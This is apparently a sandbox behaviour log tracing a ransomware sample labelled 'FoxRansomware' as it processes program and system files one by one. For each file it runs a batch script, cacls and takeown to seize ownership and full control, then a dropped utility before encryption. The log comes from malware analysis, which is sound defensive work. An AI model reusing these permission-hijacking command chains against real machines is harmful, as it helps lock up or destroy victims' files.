    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4608): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4708): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
    C:\Windows\SysWOW64\cacls.exe (PID 4752): cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4764; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    C:\Windows\SysWOW64\cmd.exe (PID 4768): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4800): sOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4780): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4812): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
    C:\Windows\SysWOW64\cacls.exe (PID 4724): cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4860; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    C:\Windows\SysWOW64\cmd.exe (PID 4864): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ChessMCE.png" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4888): sOCkujKF.exe -accepteula "ChessMCE.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 564): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4880): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
    C:\Windows\SysWOW64\cacls.exe (PID 4896): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4932; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    C:\Windows\SysWOW64\cmd.exe (PID 4840): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4852): sOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4944): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4940): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 5024): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 5016): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 5004): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "bl.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5036): sOCkujKF.exe -accepteula "bl.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5048): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4976): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 4876): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 5108; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 5116): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_super.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1904): sOCkujKF.exe -accepteula "forms_super.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 700): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 5076): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 3932): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 864; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 2848): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_browser.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1488): sOCkujKF.exe -accepteula "review_browser.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2032): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3720): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 2404): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2684): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 2660): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tl.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2372): sOCkujKF.exe -accepteula "tl.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3976): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1496): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
    C:\Windows\SysWOW64\cacls.exe (PID 3688): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2248; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    C:\Windows\SysWOW64\cmd.exe (PID 3368): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-V" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1792): sOCkujKF.exe -accepteula "Identity-V" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3724): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3172): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
    C:\Windows\SysWOW64\cacls.exe (PID 3488): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 1520; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    C:\Windows\SysWOW64\cmd.exe (PID 4056): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1544): sOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2816): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1000): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
    C:\Windows\SysWOW64\cacls.exe (PID 3860): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2784): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    C:\Windows\SysWOW64\cmd.exe (PID 776): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1816): sOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1564): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3800): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
    C:\Windows\SysWOW64\cacls.exe (PID 2624): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3816; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    C:\Windows\SysWOW64\cmd.exe (PID 1692): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt55.ths" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 912): sOCkujKF.exe -accepteula "brt55.ths" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2820): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3848): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
    C:\Windows\SysWOW64\cacls.exe (PID 1684): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 1176): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    C:\Windows\SysWOW64\cmd.exe (PID 1396): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.hsp" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1020): sOCkujKF.exe -accepteula "usa03.hsp" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1652): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3532): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
    C:\Windows\SysWOW64\cacls.exe (PID 348): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3916): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    C:\Windows\SysWOW64\cmd.exe (PID 3920): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1712): sOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 204): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 228): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
    C:\Windows\SysWOW64\cacls.exe (PID 2456): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2052): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    C:\Windows\SysWOW64\cmd.exe (PID 3808): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1252.TXT" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3956): sOCkujKF.exe -accepteula "CP1252.TXT" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4000): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1444): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
    C:\Windows\SysWOW64\cacls.exe (PID 2840): cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2604; Modifies file permissions; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    C:\Windows\SysWOW64\cmd.exe (PID 2272): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "device.png" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2500): sOCkujKF.exe -accepteula "device.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3348): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1356): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
    C:\Windows\SysWOW64\cacls.exe (PID 2176): cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3908; Modifies file permissions; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    C:\Windows\SysWOW64\cmd.exe (PID 2316): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3384): sOCkujKF.exe -accepteula "resource.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3452): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 2380): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
    C:\Windows\SysWOW64\cacls.exe (PID 3116): cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4180; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    C:\Windows\SysWOW64\cmd.exe (PID 3256): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4160): sOCkujKF.exe -accepteula "tasks.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1384): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 2740): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
    C:\Windows\SysWOW64\cacls.exe (PID 2596): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2060): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    C:\Windows\SysWOW64\cmd.exe (PID 2448): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "RTC.der" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3692): sOCkujKF.exe -accepteula "RTC.der" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 332): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3124): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 4156): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3396): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 1580): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "end_review.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 552): sOCkujKF.exe -accepteula "end_review.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3312): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 2304): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 1592): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2552): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 1736): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4120): sOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2752): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3864): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 1760): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 812): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 4148): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_ok.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4132): sOCkujKF.exe -accepteula "server_ok.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3224): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4128): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 2872): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2664): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 988): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "warning.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2160): sOCkujKF.exe -accepteula "warning.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3444): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4020): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
    C:\Windows\SysWOW64\cacls.exe (PID 4008): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3700): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    C:\Windows\SysWOW64\cmd.exe (PID 4084): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3380): sOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4032): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 2992): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
    C:\Windows\SysWOW64\cacls.exe (PID 2180): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3684): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    C:\Windows\SysWOW64\cmd.exe (PID 1320): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFB" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3236): sOCkujKF.exe -accepteula "SY______.PFB" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2072): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3408): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
    C:\Windows\SysWOW64\cacls.exe (PID 1680): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3780): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    C:\Windows\SysWOW64\cmd.exe (PID 3420): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.hyp" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2012): sOCkujKF.exe -accepteula "brt.hyp" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2128): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1604): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
    C:\Windows\SysWOW64\cacls.exe (PID 3040): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3100): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    C:\Windows\SysWOW64\cmd.exe (PID 1988): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng32.clx" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3288): sOCkujKF.exe -accepteula "eng32.clx" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3712): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4016): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
    C:\Windows\SysWOW64\cacls.exe (PID 1032): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2628; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    C:\Windows\SysWOW64\cmd.exe (PID 2100): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3160): sOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2952): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1268): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
    C:\Windows\SysWOW64\cacls.exe (PID 4208): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4200): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
